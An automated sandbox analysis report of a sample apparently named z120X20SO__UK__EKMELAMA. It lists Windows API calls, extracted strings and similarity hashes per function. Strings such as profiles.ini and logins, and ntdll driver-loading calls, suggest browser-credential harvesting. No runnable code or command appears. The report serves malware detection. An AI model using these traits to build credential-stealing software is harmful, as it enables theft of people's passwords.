                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                                                                                                              • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                                                                                                              • API String ID: 2454223109-1580313836
                                                                                                                                                              • Opcode ID: a77b9e8d0023a9b0013669bfcd7e150c1f61845d053eff75771d06e602164fa8
                                                                                                                                                              • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                                                                                                              • Opcode Fuzzy Hash: a77b9e8d0023a9b0013669bfcd7e150c1f61845d053eff75771d06e602164fa8
                                                                                                                                                              • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                                                                                                              • SetMenu.USER32(?,00000000), ref: 00411453
                                                                                                                                                              • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                                                                                                              • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                                                                                                              • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                                                                                                              • memcpy.MSVCRT(?,?,00002008,?,00000000,/nosaveload,00000000,00000001), ref: 004115C8
                                                                                                                                                              • ShowWindow.USER32(?,?), ref: 004115FE
                                                                                                                                                              • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                                                                                                              • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                                                                                                              • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                                                                                                              • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                                                                                                              • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                                                                                                                • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                                                                                                                • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                                                                                                              • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                                                                                                              • API String ID: 4054529287-3175352466
                                                                                                                                                              • Opcode ID: 8847399f9b9726e4c3d36038752de16191353ca0570e8d305bfc5bef64df017b
                                                                                                                                                              • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                                                                                                              • Opcode Fuzzy Hash: 8847399f9b9726e4c3d36038752de16191353ca0570e8d305bfc5bef64df017b
                                                                                                                                                              • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                                                                                              • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                                                              • API String ID: 3143752011-1996832678
                                                                                                                                                              • Opcode ID: 2285b8ceb197b06ade8a7456e1cd80ecea3148a8de1f9abac7666ee038ff1786
                                                                                                                                                              • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                                                                                                                                                              • Opcode Fuzzy Hash: 2285b8ceb197b06ade8a7456e1cd80ecea3148a8de1f9abac7666ee038ff1786
                                                                                                                                                              • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                                                                                                                                                              APIs
                                                                                                                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                                                                              • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                                                                              • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                                                                              • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                                                                              • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                                                                              • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                                                                              • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                                                                              • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AddressProc$HandleModule
                                                                                                                                                              • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                                                                                                              • API String ID: 667068680-2887671607
                                                                                                                                                              • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                                                                              • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                                                                                                                              • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                                                                              • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                                                                                              • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                                                              • API String ID: 1607361635-601624466
                                                                                                                                                              • Opcode ID: 5308ba8bd989b40c7668cc636176173edab96e663f2450d9c372c8e2c13fb1a4
                                                                                                                                                              • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                                                                                                                                              • Opcode Fuzzy Hash: 5308ba8bd989b40c7668cc636176173edab96e663f2450d9c372c8e2c13fb1a4
                                                                                                                                                              • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _snwprintf$memset$wcscpy
                                                                                                                                                              • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                                              • API String ID: 2000436516-3842416460
                                                                                                                                                              • Opcode ID: f43de039386cd0382df8450c395ac1cae23be0dcf7256b882f2abc90b2723d32
                                                                                                                                                              • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                                                                                                              • Opcode Fuzzy Hash: f43de039386cd0382df8450c395ac1cae23be0dcf7256b882f2abc90b2723d32
                                                                                                                                                              • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                                                                                                                • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                                                                                                                • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                                                                • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                                                                • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                                                                • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                                                                • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                                                                • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                                                                • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                                                                • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                                                                • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                                                                                                              • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                                                                                                              • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                                                                                                              • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                                                                                                              • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                                                                                                              • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                                                                                                              • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                                                                                                              • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                                                                                                              • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                                                                                                              • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1043902810-0
                                                                                                                                                              • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                                                                              • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                                                                                                                              • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                                                                              • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                                                                                                                              APIs
                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT(?,00000000,0040DC1B,?,00000000), ref: 0044480A
                                                                                                                                                              • _snwprintf.MSVCRT ref: 0044488A
                                                                                                                                                              • wcscpy.MSVCRT ref: 004448B4
                                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ??2@??3@_snwprintfwcscpy
                                                                                                                                                              • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                                                                              • API String ID: 2899246560-1542517562
                                                                                                                                                              • Opcode ID: 19d6998bfdee0d99a36ebb4c1c86c750fd11cd17c22eb045823aea5ab7461c2f
                                                                                                                                                              • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                                                                                                                              • Opcode Fuzzy Hash: 19d6998bfdee0d99a36ebb4c1c86c750fd11cd17c22eb045823aea5ab7461c2f
                                                                                                                                                              • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 0040DBCD
                                                                                                                                                              • memset.MSVCRT ref: 0040DBE9
                                                                                                                                                                • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                                                                                                                • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT(?,00000000,0040DC1B,?,00000000), ref: 0044480A
                                                                                                                                                                • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                                                                                                                                • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                                                                                                                              • wcscpy.MSVCRT ref: 0040DC2D
                                                                                                                                                              • wcscpy.MSVCRT ref: 0040DC3C
                                                                                                                                                              • wcscpy.MSVCRT ref: 0040DC4C
                                                                                                                                                              • EnumResourceNamesW.KERNEL32(0040DD4B,00000004,0040D957,00000000), ref: 0040DCB1
                                                                                                                                                              • EnumResourceNamesW.KERNEL32(0040DD4B,00000005,0040D957,00000000), ref: 0040DCBB
                                                                                                                                                              • wcscpy.MSVCRT ref: 0040DCC3
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                                                                                                                                              • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                                                                                                                              • API String ID: 3330709923-517860148
                                                                                                                                                              • Opcode ID: f76f60bccd3da85fbe49f53365f8b4a79ddd0aed292bd4a30626083a862f5199
                                                                                                                                                              • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                                                                                                                                              • Opcode Fuzzy Hash: f76f60bccd3da85fbe49f53365f8b4a79ddd0aed292bd4a30626083a862f5199
                                                                                                                                                              • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                                                                • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                                                              • memset.MSVCRT ref: 0040806A
                                                                                                                                                              • memset.MSVCRT ref: 0040807F
                                                                                                                                                              • _wtoi.MSVCRT(00000000,00000000,00000136,00000000,00000135,00000000,00000134,00000000,00000133,00000000,00000132,00000000,00000131,00000000,00000130,00000000), ref: 004081AF
                                                                                                                                                              • _wcsicmp.MSVCRT ref: 004081C3
                                                                                                                                                              • memset.MSVCRT ref: 004081E4
                                                                                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                                                                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                                                                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                                                                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                                                                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                                                                                                                                                • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                                                                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                                                                                                                                                • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                                                                                                                                                • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                                                                                                                                                • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                                                                                                • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                                                                                                • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                                                                                                • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                                                                                                • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                                                                                                                                                • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                                                                                • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$CloseFileHandleSize_wtoi_wtoi64wcscpy
                                                                                                                                                              • String ID: logins$null
                                                                                                                                                              • API String ID: 2148543256-2163367763
                                                                                                                                                              • Opcode ID: 0c5bf0fe86f5c58e26a0e15e1bc426e9e739ab0ab567f24c82d75e1353058837
                                                                                                                                                              • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                                                                                                                                                              • Opcode Fuzzy Hash: 0c5bf0fe86f5c58e26a0e15e1bc426e9e739ab0ab567f24c82d75e1353058837
                                                                                                                                                              • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000001,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 0040859D
                                                                                                                                                                • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                              • memset.MSVCRT ref: 004085CF
                                                                                                                                                              • memset.MSVCRT ref: 004085F1
                                                                                                                                                              • memset.MSVCRT ref: 00408606
                                                                                                                                                              • strcmp.MSVCRT ref: 00408645
                                                                                                                                                              • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                                                                                                                                              • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                                                                                                                                              • memset.MSVCRT ref: 0040870E
                                                                                                                                                              • strcmp.MSVCRT ref: 0040876B
                                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                                                                                                                                              • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2609341588.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2609341588.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                              • String ID: ---
                                                                                                                                                              • API String ID: 3437578500-2854292027
                                                                                                                                                              • Opcode ID: 514a4b219222fc308ac2af9ebc5a2bc9af16dfffa76d3dbf40f60a33dc7994f2
                                                                                                                                                              • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                                                                                                                              • Opcode Fuzzy Hash: 514a4b219222fc308ac2af9ebc5a2bc9af16dfffa76d3dbf40f60a33dc7994f2
                                                                                                                                                              • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 0041087D
                                                                                                                                                              • memset.MSVCRT ref: 00410892
                                                                                                                                                              • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                                                              • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                                                              • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                                                              • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                                                              • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                                                              • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                                                              • GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                                                              • DeleteObject.GDI32(?), ref: 004109D0
                                                                                                                                                              • DeleteObject.GDI32(?), ref: 004109D6
                                                                                                                                                              • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                                                                                                                              Memory Dump Source
